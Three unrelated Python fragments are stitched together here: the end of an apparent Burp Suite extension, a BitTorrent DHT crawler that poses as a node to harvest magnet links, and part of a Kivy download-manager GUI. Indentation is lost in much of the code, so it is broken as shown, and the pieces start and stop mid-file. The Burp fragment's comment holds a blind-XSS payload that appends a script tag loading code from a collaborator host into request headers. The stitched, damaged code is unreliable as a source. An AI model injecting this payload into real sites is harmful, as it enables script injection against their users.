def saveToFileAsync(self, file, data, isAppend=False):
def saveToFile_run(file, data, isAppend):
            # honour the isAppend flag: append when requested, otherwise overwrite
            mode = 'a' if isAppend else 'w'
            with open(file, mode) as f:
for i, k in enumerate(data):
f.write("{}\n".format(k))
f.seek(-1, os.SEEK_END)
f.truncate()
swing.SwingUtilities.invokeLater(PyRunnable(saveToFile_run, file, data, isAppend))
def getTabCaption(self):
return self.name
def getUiComponent(self):
return self._jPanel
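# Hedged illustration of what prepareRequest() does; the header value and payload are made-up
# examples. With "User-Agent" enabled in the Headers table, overwrite mode off and a payload
# of '"><script src=//{URL}></script>', a request header such as
#   User-Agent: Mozilla/5.0
# is rewritten to
#   User-Agent: Mozilla/5.0"><script src=//my.burpcollaborator.net></script>
# i.e. the payload is appended to the original value and {URL} is replaced with the
# collaborator URL from the text field.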
|
crawler.py
|
#! usr/bin/python
# encoding=utf-8
import socket
import codecs
import time
from threading import Thread
from collections import deque
from multiprocessing import Process, cpu_count
import bencoder
from .utils import get_logger, get_nodes_info, get_rand_id, get_neighbor
from .database import RedisClient
# bootstrap tracker servers and DHT router nodes; note that udp.sendto() can only reach the
# (host, port) tuples -- the announce-URL strings fail silently inside send_krpc()
BOOTSTRAP_NODES = [
"udp://tracker.open-internet.nl:6969/announce",
"udp://tracker.coppersurfer.tk:6969/announce",
"udp://exodus.desync.com:6969/announce",
"udp://tracker.opentrackr.org:1337/announce",
"udp://tracker.internetwarriors.net:1337/announce",
"udp://9.rarbg.to:2710/announce",
"udp://public.popcorn-tracker.org:6969/announce",
"udp://tracker.vanitycore.co:6969/announce",
"https://1.track.ga:443/announce",
"udp://tracker.tiny-vps.com:6969/announce",
"udp://tracker.cypherpunks.ru:6969/announce",
"udp://thetracker.org:80/announce",
"udp://tracker.torrent.eu.org:451/announce",
"udp://retracker.lanta-net.ru:2710/announce",
"udp://bt.xxx-tracker.com:2710/announce",
"http://retracker.telecom.by:80/announce",
"http://retracker.mgts.by:80/announce",
"http://0d.kebhana.mx:443/announce",
"udp://torr.ws:2710/announce",
"udp://open.stealth.si:80/announce",
("router.bittorrent.com", 6881),
("dht.transmissionbt.com", 6881),
("router.utorrent.com", 6881),
]
# maximum size of the node deque
MAX_NODE_QSIZE = 10000
# UDP receive buffer size
UDP_RECV_BUFFSIZE = 65535
# server host
SERVER_HOST = "0.0.0.0"
# base server port
SERVER_PORT = 9090
# magnet link prefix
MAGNET_PER = "magnet:?xt=urn:btih:{}"
# sleep time inside the while loops
SLEEP_TIME = 1e-5
# node id length in bytes
PER_NID_LEN = 20
# interval of the bootstrap timer (seconds)
PER_SEC_BS_TIMER = 8
# number of worker processes (half of the CPU cores, at least one)
MAX_PROCESSES = cpu_count() // 2 or cpu_count()
class HNode:
def __init__(self, nid, ip=None, port=None):
self.nid = nid
self.ip = ip
self.port = port
class DHTServer:
def __init__(self, bind_ip, bind_port, process_id):
self.bind_ip = bind_ip
self.bind_port = bind_port
self.process_id = process_id
self.nid = get_rand_id()
        # discovered nodes are kept in a bounded deque
self.nodes = deque(maxlen=MAX_NODE_QSIZE)
        # KRPC is a simple RPC structure encoded with bencode and carried in UDP datagrams.
self.udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        # bind the UDP socket
self.udp.bind((self.bind_ip, self.bind_port))
        # redis client
self.rc = RedisClient()
self.logger = get_logger("logger_{}".format(bind_port))
def bootstrap(self):
"""
        Join the DHT network by contacting the bootstrap nodes while masquerading as a DHT node.
"""
for address in BOOTSTRAP_NODES:
self.send_find_node(address)
def bs_timer(self):
"""
        Run bootstrap() periodically.
"""
t = 1
while True:
if t % PER_SEC_BS_TIMER == 0:
t = 1
self.bootstrap()
t += 1
time.sleep(1)
def send_krpc(self, msg, address):
"""
        Send a KRPC message.
        :param msg: the message to send as a UDP datagram
        :param address: destination address, an (ip, port) tuple
"""
try:
            # the message must be bencode-encoded before sending
self.udp.sendto(bencoder.bencode(msg), address)
except:
pass
def send_error(self, tid, address):
"""
        Send an error reply.
"""
msg = dict(t=tid, y="e", e=[202, "Server Error"])
self.send_krpc(msg, address)
def send_find_node(self, address, nid=None):
"""
        Send a find_node request.
        `find_node request`
        find_node is used to look up the contact information of the node with a
        given ID; in KRPC this is "q" == "find_node". The request carries two
        arguments: "id", the ID of the querying node, and "target", the ID of the
        node being looked up. A node that receives a find_node request should
        reply with the keys "id" and "nodes", where "nodes" is a string holding
        the compact contact information of the K (8) nodes in its routing table
        that are closest to the target.
        `example`
        arguments: {"id" : "<querying nodes id>", "target" : "<id of target node>"}
        response: {"id" : "<queried nodes id>", "nodes" : "<compact node info>"}
        :param address: address tuple (ip, port)
        :param nid: node id
"""
nid = get_neighbor(nid) if nid else self.nid
tid = get_rand_id()
msg = dict(
t=tid,
y="q",
q="find_node", # 指定请求为 find_node
a=dict(id=nid, target=get_rand_id()),
)
self.send_krpc(msg, address)
def send_find_node_forever(self):
"""
        Send find_node requests in a loop.
"""
self.logger.info("send find node forever...")
while True:
try:
                # pop a node from the deque
node = self.nodes.popleft()
self.send_find_node((node.ip, node.port), node.nid)
time.sleep(SLEEP_TIME)
except IndexError:
                # once the node queue is empty, rejoin the DHT network
self.bootstrap()
def save_magnet(self, info_hash):
"""
        Save the magnet link to the database.
        :param info_hash: the info_hash of the magnet link
"""
        # hex-encode the info_hash via codecs
hex_info_hash = codecs.getencoder("hex")(info_hash)[0].decode()
magnet = MAGNET_PER.format(hex_info_hash)
self.rc.add_magnet(magnet)
# self.logger.info("pid " + str(self.process_id) + " - " + magnet)
self.logger.info("pid_{0} - {1}".format(self.process_id, magnet))
def on_message(self, msg, address):
"""
        Dispatch an incoming message.
        :param msg: the decoded message
        :param address: the sender address
"""
try:
            # `response`
            # When the "y" key of a KRPC message is "r", the message carries an extra
            # key "r" whose value is a dictionary of returned values; such a reply is
            # only sent after the corresponding request was parsed correctly.
if msg[b"y"] == b"r":
                # "nodes" is a string holding the compact contact information of the
                # K nodes in the queried node's routing table closest to the target.
if msg[b"r"].get(b"nodes", None):
self.on_find_node_response(msg)
            # `request`
            # When the "y" key is "q", the message carries two extra keys: "q", the
            # method name (a string), and "a", a dictionary of the request arguments.
            # In practice we only need the info hash from these requests in order to
            # build magnet links and then fetch the torrents.
elif msg[b"y"] == b"q":
                # get_peers relates to a torrent's info_hash; in KRPC this is
                # "q" == "get_peers". The request has two arguments: "id", the ID of the
                # querying node, and "info_hash", the info_hash of the torrent.
if msg[b"q"] == b"get_peers":
self.on_get_peers_request(msg, address)
                # announce_peer indicates that the requesting node is downloading a
                # torrent on some port. It has four arguments: "id", the requesting
                # node's ID; "info_hash", the torrent's info_hash; "port", the port the
                # peer is downloading on; and "token", the value received in the reply
                # to an earlier get_peers request.
elif msg[b"q"] == b"announce_peer":
self.on_announce_peer_request(msg, address)
except KeyError:
pass
def on_find_node_response(self, msg):
"""
        Decode the node information and store the nodes in the deque.
        :param msg: the reply message
"""
nodes = get_nodes_info(msg[b"r"][b"nodes"])
for node in nodes:
nid, ip, port = node
            # basic validity check on the node
if len(nid) != PER_NID_LEN or ip == self.bind_ip:
continue
            # append the node to the deque
self.nodes.append(HNode(nid, ip, port))
def on_get_peers_request(self, msg, address):
"""
        Handle a get_peers request and extract the info hash.
        :param msg: the request message
        :param address: the sender address
"""
tid = msg[b"t"]
try:
info_hash = msg[b"a"][b"info_hash"]
self.save_magnet(info_hash)
except KeyError:
            # no info hash present, send an error reply
self.send_error(tid, address)
def on_announce_peer_request(self, msg, address):
"""
        Handle an announce_peer request and extract the info hash.
        This crawler only collects magnet links, so the peer's address and port are
        ignored; developers who need them can extend this part themselves.
        :param msg: the request message
        :param address: the sender address
"""
tid = msg[b"t"]
try:
info_hash = msg[b"a"][b"info_hash"]
self.save_magnet(info_hash)
except KeyError:
            # no info hash present, send an error reply
self.send_error(tid, address)
def receive_response_forever(self):
"""
        Receive UDP responses in a loop.
"""
self.logger.info(
"receive response forever {}:{}".format(self.bind_ip, self.bind_port)
)
        # join the DHT network first
self.bootstrap()
while True:
try:
                # receive a datagram
data, address = self.udp.recvfrom(UDP_RECV_BUFFSIZE)
                # decode the received data with bdecode
msg = bencoder.bdecode(data)
                # dispatch the message
self.on_message(msg, address)
time.sleep(SLEEP_TIME)
except Exception as e:
self.logger.warning(e)
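# Hedged illustration, defined at module level and not called by the crawler: shows roughly
# what a bencoded find_node request looks like on the wire. The transaction id and node ids
# are made-up constants.
def _example_bencoded_find_node():
    msg = dict(t=b"aa", y=b"q", q=b"find_node",
               a=dict(id=b"a" * 20, target=b"b" * 20))
    # bencoder.bencode(msg) yields something like:
    # b'd1:ad2:id20:aaaaaaaaaaaaaaaaaaaa6:target20:bbbbbbbbbbbbbbbbbbbbe1:q9:find_node1:t2:aa1:y1:qe'
    return bencoder.bencode(msg)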
def _start_thread(offset):
"""
    Start the worker threads for one DHT server instance.
    :param offset: port offset added to SERVER_PORT
"""
dht = DHTServer(SERVER_HOST, SERVER_PORT + offset, offset)
threads = [
Thread(target=dht.send_find_node_forever),
Thread(target=dht.receive_response_forever),
Thread(target=dht.bs_timer),
]
for t in threads:
t.start()
for t in threads:
t.join()
def start_server():
"""
    Start the service with multiple processes, each running its own threads.
"""
processes = []
for i in range(MAX_PROCESSES):
processes.append(Process(target=_start_thread, args=(i,)))
for p in processes:
p.start()
for p in processes:
p.join()
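# Hedged usage note: this module relies on package-relative imports (".utils", ".database"),
# so it is meant to be launched through its package; the package name is not known from this
# file, but the entry point is simply start_server(), e.g.
#   from <package>.crawler import start_server
#   start_server()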
|
App.py
|
from Graphics import Config
import datetime as dt
import importlib
import multiprocessing
import os
import platform
import threading
import tkinter as tk
from tkinter import filedialog
from kivy.clock import Clock
from kivy.lang.builder import Builder
from kivy.metrics import dp
from kivy.properties import ColorProperty, ObjectProperty
from kivy.uix.scrollview import ScrollView
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
from kivy.uix.label import Label
from kivy.uix.screenmanager import Screen, ScreenManager
from kivy.uix.textinput import TextInput
from kivy.uix.widget import Widget
from kivymd.app import MDApp
from kivymd.uix.card import MDCard
from kivymd.uix.label import MDLabel
from kivymd.uix.navigationdrawer import MDNavigationDrawer
from kivymd.uix.progressbar import MDProgressBar
from kivymd.uix.textfield import MDTextField
from kivymd.uix.menu import MDDropdownMenu
from kivymd.uix.button import MDIconButton
import Assets.Functions.Parser as p
from Assets.Engine.Engine import TellyEngine
from Assets.Functions.Data import (check_type, copy_data,
create_random_characters, get_standard_size,
paste_data, shorten_int, shorten_string)
from Assets.Functions.Methods import do_nothing
from Assets.Functions.Networks import (check_link_validity,
check_network_connection)
from Assets.Sound.Sound import beep
from Graphics.Buttons import FlatButton
from Graphics.Colors import (get_main_theme_color, get_sub_theme_color,
get_transparent_sub_theme_color)
from Graphics.Intuix.all_downloads_tab import (all_downloading,
all_downloads_bg,
all_downloads_box, all_error,
all_finished, all_label,
all_paused)
from Graphics.Intuix.downloading_tab import (downloading_all, downloading_bg,
downloading_error,
downloading_finished,
downloading_label,
downloading_paused)
from Graphics.Intuix.error_downloads import (error_all, error_bg,
error_downloading, error_finished,
error_label, error_paused)
from Graphics.Intuix.finished_downloads import (finished_all, finished_bg,
finished_downloading,
finished_error, finished_label,
finished_paused)
from Graphics.Intuix.paused_downloads import (paused_all, paused_bg,
paused_downloading, paused_error,
paused_finished, paused_label)
from Graphics.Intuix.Settings import (affirm_settings, cancel_new_settings,
restore_default_settings_query,
save_new_settings_query,
settings_bg_scroll)
from Graphics.Popups import PopupBox, SnackBar
Builder.load_string(
"""
<MainLayout>:
canvas.before:
Color:
rgb: root.theme
Rectangle:
size: self.size"""
)
class MainLayout(BoxLayout):
# important methods are defined for later use throughout the class
# variables
errors = 0
finished = 0
downloads = 0
paused = 0
app_version = Config.app_version
in_service_pids = []
# widgets
manager = ScreenManager()
con_label = Label()
down_label = Label()
download_frame = BoxLayout()
finished_label = Label()
error_label = Label()
paused_label = Label()
settings_holder = BoxLayout()
download_frame_manager = ScreenManager()
all_downloads_tab = Screen()
downloading_tab = Screen()
paused_download_tab = Screen()
error_downloads_tab = Screen()
finished_downloads_tab = Screen()
history_holder = BoxLayout()
# kivy based widgets
drawer = ObjectProperty()
theme = ColorProperty()
navbar = ObjectProperty()
nav_link = ObjectProperty()
home = ObjectProperty()
enter_bt = ObjectProperty()
back_st = ObjectProperty()
back_hst = ObjectProperty()
back_hp = ObjectProperty()
download_pop = ObjectProperty()
url_box = ObjectProperty()
dir_input = ObjectProperty()
def __init__(self, **kwargs):
super(MainLayout, self).__init__(**kwargs)
# the screen manager is added before hand
self.add_widget(self.manager)
        # the individual screens are built and added on worker threads
        threading.Thread(target=self.home_tab_init).start()
        threading.Thread(target=self.settings_tab_init).start()
        threading.Thread(target=self.history_tab_init).start()
        threading.Thread(target=self.help_tab_init).start()
        # a timer updates the whole program roughly 99 times per second
Clock.schedule_interval(self.app_essentials_update, 1 / 99)
def home_tab_init(self):
# home tab
home_tab = Screen(name="home")
self.manager.add_widget(home_tab)
self.home = BoxLayout(orientation="vertical")
self.navbar = MDCard()
self.navbar.size_hint = (1, None)
self.navbar.height = dp(40)
self.home.add_widget(self.navbar)
        threading.Thread(target=self.navbar_init).start()
        threading.Thread(target=self.top_bar_init).start()
        threading.Thread(target=self.info_bar_init).start()
        threading.Thread(target=self.download_frame_init).start()
home_tab.add_widget(self.home)
# drawer
self.drawer = MDNavigationDrawer()
self.drawer.md_bg_color = (.16, .55, 1, .3)
        threading.Thread(target=self.drawer_content_init).start()
home_tab.add_widget(self.drawer)
def top_bar_init(self):
# the drop down for the link box
self.dropdown = MDDropdownMenu(width_mult=100)
self.dropdown.background_color = get_sub_theme_color(essence="tuple")
self.dropdown.position = "bottom"
self.dropdown.border_margin = 0
# the dropdown function
def drop(instance, touch):
if touch.button == "right":
if self.nav_link.focus:
self.dropdown.open()
# the top bar
text_bx = BoxLayout(orientation="horizontal", size_hint=(1, None), height=dp(40))
self.nav_link = TextInput(size_hint=(1, 1), multiline=False)
self.nav_link.background_active = ""
self.nav_link.foreground_color = (1, 1, 1, 1)
self.nav_link.background_normal = ""
self.nav_link.font_name = "Assets/Fonts/Roboto-Light.ttf"
self.nav_link.font_size = 18
# self.nav_link.border = (10, 5, 5, 5)
self.nav_link.hint_text = "Paste Link Here: Right click for more options"
self.nav_link.on_text_validate = self.checker
# menu items for the dropdown
menu_items = [
{
"text": "Paste",
"viewclass": "OneLineListItem",
"on_release": lambda :self.copy_paste_empty(receiver="nav_link", action="paste")
},
{
"text": "Cancel",
"viewclass": "OneLineListItem",
"on_release": lambda :self.copy_paste_empty(receiver="nav_link", action="empty")
},
{
"text": "Copy",
"viewclass": "OneLineListItem",
"on_release": lambda :self.copy_paste_empty(receiver="nav_link", action="copy")
},
{
"text": "Enter",
"viewclass": "OneLineListItem",
"on_release": self.checker
}
]
self.dropdown.items = menu_items
text_bx.ids['nav_link'] = self.nav_link
self.dropdown.caller = text_bx.ids.nav_link
self.nav_link.bind(on_touch_down=drop)
# the enter button
self.enter_bt = Button(text="Enter", size_hint=(.1, 1), on_press=lambda obj: self.checker())
self.enter_bt.background_normal = ""
self.enter_bt.background_down = ""
self.enter_bt.font_name = "Assets/Fonts/DroidSans.ttf"
text_bx.add_widget(self.nav_link)
text_bx.add_widget(self.enter_bt)
self.home.add_widget(text_bx)
def navbar_init(self):
# the navigation bar
self.navbar.add_widget(FlatButton(text="File", on_press=lambda obj: threading.Thread(target = lambda :self.toggle_drawer()).start()))
self.download_popup()
self.navbar.add_widget(FlatButton(text="Download", on_press=lambda obj: threading.Thread(target= lambda :self.download_pop.pop()).start()))
self.navbar.add_widget(FlatButton(text="Settings", on_press=lambda obj: threading.Thread(target=lambda :self.change_tab("settings")).start()))
self.navbar.add_widget(FlatButton(text="History", on_press=lambda obj: threading.Thread(target=lambda :self.change_tab("history")).start()))
self.navbar.add_widget(FlatButton(text="Help", on_press=lambda obj: threading.Thread(target=lambda :self.change_tab("help")).start()))
def info_bar_init(self):
# the info bar
infobar = MDCard(size_hint=(1, None), height=dp(20))
self.home.add_widget(infobar)
# the information
infobar.add_widget(self.con_label)
infobar.add_widget(self.down_label)
infobar.add_widget(self.finished_label)
infobar.add_widget(self.error_label)
infobar.add_widget(self.paused_label)
def drawer_content_init(self):
# the sliding menu
drawer_bg = BoxLayout(orientation="vertical")
stats_box = BoxLayout(pos_hint={'top': 1}, size_hint=(1, .2), padding=(10, 10, 10, 10), spacing=(10, 10))
downloads_box = BoxLayout()
downloads_card = MDCard(size_hint=(1, 1), pos_hint={'x': 0, 'y': 0}, orientation="vertical", radius=5)
downloads_card.md_bg_color = (.16, .55, 1, 1)
downloads_card.add_widget(Label(pos_hint={'x': 0, 'y': .7}, height=dp(52), size_hint=(1, None), font_size=50,
text=str(shorten_int(Config.total_downloads, 100, pd="99+"))))
downloads_card.add_widget(Label(size_hint=(1, None), height=dp(25), text="Downloads"))
downloads_box.add_widget(downloads_card)
stats_box.add_widget(downloads_box)
tab_a = Widget(size_hint=(.1, 1))
stats_box.add_widget(tab_a)
total_size_box = BoxLayout()
total_size_card = MDCard(size_hint=(1, 1), pos_hint={'x': 0, 'y': 0})
total_size_card.orientation = "vertical"
total_size_card.radius = 5
total_size_card.md_bg_color = (1, .4, .5, 1)
total_size_card.add_widget(Label(pos_hint={'x': 0, 'y': .7}, height=dp(52), size_hint=(1, None), font_size=17,
text=str(get_standard_size(Config.total_sizes))))
total_size_card.add_widget(Label(size_hint=(1, None), height=dp(25), text="Total Size"))
total_size_box.add_widget(total_size_card)
stats_box.add_widget(total_size_box)
tab_b = Widget(size_hint=(.1, 1))
stats_box.add_widget(tab_b)
total_speed_box = BoxLayout()
total_speed_card = MDCard(size_hint=(1, 1), pos_hint={'x': 0, 'y': 0})
total_speed_card.radius = 5
total_speed_card.orientation = "vertical"
total_speed_card.md_bg_color = (.5, 1, .4, 1)
total_speed_card.add_widget(Label(pos_hint={'x': 0, 'y': .7}, height=dp(52), size_hint=(1, None), font_size=17,
text=str(get_standard_size(Config.total_speeds)) + "/s"))
total_speed_card.add_widget(Label(size_hint=(1, None), height=dp(25), text="Total Speed"))
total_speed_box.add_widget(total_speed_card)
stats_box.add_widget(total_speed_box)
drawer_bg.add_widget(stats_box)
button_box = BoxLayout(orientation="vertical", padding=(5, 10, 0, 5))
inf_label = MDLabel(text="Categories")
inf_label.color = (1, 1, 1, 1)
inf_label.font_name = "Assets/Fonts/FiraCode-Bold.ttf"
inf_label.font_size = dp(25)
button_box.add_widget(inf_label)
all_down = MDCard(size_hint=(1, 1))
all_bt = Button(text="Show all downloads", on_press=lambda obj: threading.Thread(target=lambda :self.change_download_tab("all")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(target=lambda :self.toggle_drawer()).start())
all_down.add_widget(all_bt)
button_box.add_widget(all_down)
finished_down = MDCard(size_hint=(1, 1))
fin_bt = Button(text="Show finished downloads", on_press=lambda obj: threading.Thread(target=lambda :self.change_download_tab("finished")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(target=lambda :self.toggle_drawer()).start())
finished_down.add_widget(fin_bt)
button_box.add_widget(finished_down)
down_down = MDCard(size_hint=(1, 1))
down_bt = Button(text="Show downloading", on_press=lambda obj: threading.Thread(target=lambda :self.change_download_tab("downloading")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(target=lambda :self.toggle_drawer()).start())
down_down.add_widget(down_bt)
button_box.add_widget(down_down)
paused_down = MDCard(size_hint=(1, 1))
paused_bt = Button(text="Show all paused downloads", on_press=lambda obj: threading.Thread(target=lambda :self.change_download_tab("paused")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(target=lambda :self.toggle_drawer()).start())
paused_down.add_widget(paused_bt)
button_box.add_widget(paused_down)
error_down = MDCard(size_hint=(1, 1))
error_bt = Button(text="Show all Error downloads", on_press=lambda obj: threading.Thread(target =lambda :self.change_download_tab("error")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(self.toggle_drawer()).start())
error_down.add_widget(error_bt)
button_box.add_widget(error_down)
ess_label = MDLabel(text="Essentials")
ess_label.color = (1, 1, 1, 1)
ess_label.font_name = "Assets/Fonts/FiraCode-Bold.ttf"
ess_label.font_size = dp(25)
button_box.add_widget(ess_label)
settings = MDCard()
set_bt = Button(text="Change App Settings", on_press=lambda obj: self.toggle_drawer())
set_bt.bind(on_press=lambda obj: self.change_tab("settings"))
set_bt.background_normal = ""
set_bt.background_color = "#3A9259"
settings.add_widget(set_bt)
button_box.add_widget(settings)
history = MDCard()
hist_bt = Button(text="Show Download Histories", on_press=lambda obj: self.toggle_drawer())
hist_bt.bind(on_press=lambda obj: self.change_tab("history"))
hist_bt.background_normal = ""
hist_bt.background_color = "#FF9BA0"
history.add_widget(hist_bt)
button_box.add_widget(history)
help_bt_card = MDCard()
help_bt = Button(text="Find Help", on_press=lambda obj: self.change_tab("help"))
help_bt.bind(on_press=lambda obj: self.toggle_drawer())
help_bt.background_normal = ""
help_bt.background_color = "#6AAFFF"
help_bt_card.add_widget(help_bt)
button_box.add_widget(help_bt_card)
sys_bt_card = MDCard()
sys_bt = Button(text="Exit App")
sys_bt.background_normal = ""
sys_bt.background_color = "#FF5356"
sys_bt_card.add_widget(sys_bt)
button_box.add_widget(sys_bt_card)
drawer_bg.add_widget(button_box)
inf_label = MDLabel(text="Information")
inf_label.color = (1, 1, 1, 1)
inf_label.font_name = "Assets/Fonts/FiraCode-Bold.ttf"
inf_label.font_size = dp(25)
button_box.add_widget(inf_label)
sys_inf = PopupBox(essence="central", title="System Information",
bg_color=get_main_theme_color(essence="string"))
sys_inf_box = BoxLayout(orientation="horizontal")
sys_lbl_bx = BoxLayout(size_hint=(.45, 1), orientation='vertical')
sys_lbl_bx.add_widget(MDLabel(text="Operating System"))
sys_lbl_bx.add_widget(MDLabel(text="OS Version"))
sys_lbl_bx.add_widget(MDLabel(text="System Architecture"))
sys_lbl_bx.add_widget(MDLabel(text="System Processor"))
sys_lbl_bx.add_widget(MDLabel(text="Machine"))
sys_inf_box.add_widget(sys_lbl_bx)
sys_cor_bx = BoxLayout(orientation="vertical")
sys_cor_bx.add_widget(MDLabel(text=platform.system()))
sys_cor_bx.add_widget(MDLabel(text=platform.version()))
sys_cor_bx.add_widget(MDLabel(text=platform.architecture()[0]))
sys_cor_bx.add_widget(MDLabel(text=platform.processor()))
sys_cor_bx.add_widget(MDLabel(text=platform.machine()))
sys_inf_box.add_widget(sys_cor_bx)
sys_inf.content(sys_inf_box)
sys_bt_card = MDCard()
sys_bt = Button(text="System Information", on_press=lambda obj: sys_inf.pop())
sys_bt.background_normal = ""
sys_bt.background_color = "#FF5356"
sys_bt_card.add_widget(sys_bt)
button_box.add_widget(sys_bt_card)
app_inf = PopupBox(essence="central", title="App Information", bg_color=get_main_theme_color(essence="string"))
app_inf_box = BoxLayout(orientation="horizontal")
app_lbl_bx = BoxLayout(size_hint=(.45, 1), orientation='vertical')
app_lbl_bx.add_widget(MDLabel(text="App Version"))
app_lbl_bx.add_widget(MDLabel(text="Product ID"))
app_lbl_bx.add_widget(MDLabel(text="Last Update"))
app_lbl_bx.add_widget(MDLabel(text="App Flavor"))
app_lbl_bx.add_widget(MDLabel(text="App Release Date"))
app_inf_box.add_widget(app_lbl_bx)
app_cor_bx = BoxLayout(orientation="vertical")
app_cor_bx.add_widget(MDLabel(text=Config.app_version))
app_cor_bx.add_widget(MDLabel(text=Config.product_id))
app_cor_bx.add_widget(MDLabel(text=Config.last_update))
app_cor_bx.add_widget(MDLabel(text=str(Config.flavour)))
app_cor_bx.add_widget(MDLabel(text=Config.release_date))
app_inf_box.add_widget(app_cor_bx)
app_inf.content(app_inf_box)
app_bt_card = MDCard()
app_bt = Button(text="App Information", on_press=lambda obj: app_inf.pop())
app_bt.background_normal = ""
app_bt.background_color = "#FF5356"
app_bt_card.add_widget(app_bt)
button_box.add_widget(app_bt_card)
inf_card = MDCard()
inf_card.size_hint = (1, None)
inf_card.height = dp(100)
inf_card.orientation = "vertical"
lab = MDLabel(text="Geliana Software Incorporated")
lab.font_size = 20
lab_ad = MDLabel(text="Nairobi, Kenya")
lab_rt = MDLabel(text="All Rights Reserved")
lab_cr = MDLabel(text="Copyright @2021")
lab_vs = MDLabel(text="Version " + str(Config.app_version))
inf_card.add_widget(lab)
inf_card.add_widget(lab_ad)
inf_card.add_widget(lab_rt)
inf_card.add_widget(lab_cr)
inf_card.add_widget(lab_vs)
button_box.add_widget(inf_card)
self.drawer.add_widget(drawer_bg)
def download_frame_init(self):
self.home.add_widget(self.download_frame)
self.download_frame.add_widget(self.download_frame_manager)
self.all_downloads_tab.name = "all"
self.download_frame_manager.add_widget(self.all_downloads_tab)
self.init_download_tabs()
self.downloading_tab.name = "downloading"
self.download_frame_manager.add_widget(self.downloading_tab)
self.paused_download_tab.name = "paused"
self.download_frame_manager.add_widget(self.paused_download_tab)
self.error_downloads_tab.name = "error"
self.download_frame_manager.add_widget(self.error_downloads_tab)
self.finished_downloads_tab.name = "finished"
self.download_frame_manager.add_widget(self.finished_downloads_tab)
def change_download_tab(self, tab):
self.download_frame_manager.current = tab
def toggle_drawer(self):
self.drawer.set_state("toggle")
def settings_tab_init(self):
settings_tab = Screen(name="settings")
self.manager.add_widget(settings_tab)
self.back_st = Button(text="Back", on_press=lambda obj: self.change_tab("home"), size_hint=(None, None))
self.back_st.background_normal = ""
self.back_st.height = dp(50)
self.back_st.width = dp(200)
self.back_st.pos_hint = {'x': 0, 'y': .93}
settings_tab.add_widget(self.back_st)
settings_tab.add_widget(Image(source="Assets/Media/settings.png", size_hint=(None, None), height=dp(50),
width=dp(50), pos_hint={'x': .21, "y": .93}))
settings_tab.add_widget(
Label(text="Settings", size_hint=(None, None), size=(dp(150), dp(50)), font_size=40, halign="left",
font_name="Assets/Fonts/Roboto-Light.ttf", pos_hint={"x": .265, "y": .93}))
settings_tab.add_widget(
Button(text="Restore Defaults", size_hint=(.2, None), height=dp(34), background_normal="",
background_color="04B5E6", pos_hint={'x': .45, 'y': .93},
on_press=lambda obj: restore_default_settings_query()))
settings_tab.add_widget(
Button(text="Cancel", size_hint=(.15, None), height=dp(35), background_color="FF5356", background_normal="",
pos_hint={'x': .68, 'y': .93}, on_press=lambda obj: cancel_new_settings()))
settings_tab.add_widget(Button(text="Save", size_hint=(.15, None), height=dp(35), background_color="#3A9259",
background_normal="", pos_hint={'x': .85, 'y': .93},
on_press=lambda obj: save_new_settings_query()))
self.settings_holder.size_hint = (1, .92)
self.settings_holder.pos_hint = {"x": 0, "y": 0}
settings_tab.add_widget(self.settings_holder)
self.settings_holder.add_widget(settings_bg_scroll)
def history_tab_init(self):
history = Screen(name="history")
top = BoxLayout(size_hint=(1, .05), pos_hint={'x': 0, 'y': .93})
        self.back_hst = Button(text="Back", on_press=lambda obj: self.change_tab("home"), size_hint=(None, None))
self.back_hst.background_normal = ""
self.back_hst.height = dp(50)
self.back_hst.width = dp(200)
top.add_widget(self.back_hst)
top.add_widget(Image(source="Assets/Media/history.png", size_hint=(None, None), height=dp(50),
width=dp(50)))
top.add_widget(
Label(text="History", size_hint=(None, None), size=(dp(150), dp(50)), font_size=40, halign="left",
font_name="Assets/Fonts/Roboto-Light.ttf"))
top.add_widget(Widget())
top.add_widget(
Button(text="Clear All Histories", size_hint=(None, None), background_normal="", background_down="", background_color="FF5356",
height=dp(50), width=dp(250), pos_hint={'x': .45, 'y': 0}, on_press=lambda obj: threading.Thread(target=lambda :delete_it()).start())
)
def deleting_download():
self.history_holder.clear_widgets()
            multiprocessing.Process(target=p.StorageAPI().delete_all_data).start()
SnackBar(essence="extra", message="Record Deleted", bg_color=get_sub_theme_color(essence="tuple"))
def delete_it():
if not p.KeyMatch().match("save_down_proc"):
deleting_download()
            elif p.KeyMatch().match("save_down_proc"):
                box = PopupBox(essence="central", title="Clear Histories",
                               bg_color=get_sub_theme_color(essence="string"),
                               escape=False)
                def leave(obj):
                    str(obj)
                    box.exit()
                bg_back = BoxLayout(orientation="vertical")
                bg_back.add_widget(Label(text="Are you sure you want to delete all download records?"))
                btn_box = BoxLayout(size_hint=(1, .3))
                btn_box.add_widget(Button(text="Proceed", on_press=lambda obj: deleting_download(), on_release=leave))
                btn_box.add_widget(Button(text="Cancel", on_press=leave))
                bg_back.add_widget(btn_box)
                box.pop()
                box.content(bg_back)
bottom = BoxLayout(size_hint=(1, .92))
stroller = ScrollView()
stroller.bar_color = "298AFF"
stroller.bar_width = 5
stroller.do_scroll_y = True
self.history_holder = BoxLayout(size_hint=(1, None), orientation="vertical")
def hst():
for i in p.StorageAPI().get_all_ids():
self.history_tabs(i)
threading.Thread(target=lambda: hst()).start()
history.add_widget(top)
history.add_widget(bottom)
bottom.add_widget(stroller)
stroller.add_widget(self.history_holder)
self.manager.add_widget(history)
def update_history(delta_time):
self.history_holder.height = len(p.StorageAPI().get_all_ids()) * 100
Clock.schedule_interval(update_history, 1 / 99999999999)
def open_help(self, obj):
str(obj)
self.manager.current = "help"
SnackBar(essence="extra", message="Help", bg_color=get_sub_theme_color(essence="tuple"))
def open_history(self, obj):
str(obj)
self.manager.current = "history"
SnackBar(essence="extra", message="History", bg_color=get_sub_theme_color(essence="tuple"))
def error_downloads_screen_content(self):
holder_bx = BoxLayout(orientation="vertical")
down_box = BoxLayout(size_hint=(1, .07))
# the Label
down_info_label = MDLabel(text="Error Downloads", font_name="Assets/fonts/FiraCode-Bold.ttf", size_hint=(.3, 1),
pos_hint={'x': .2, 'y': 0})
down_box.add_widget(down_info_label)
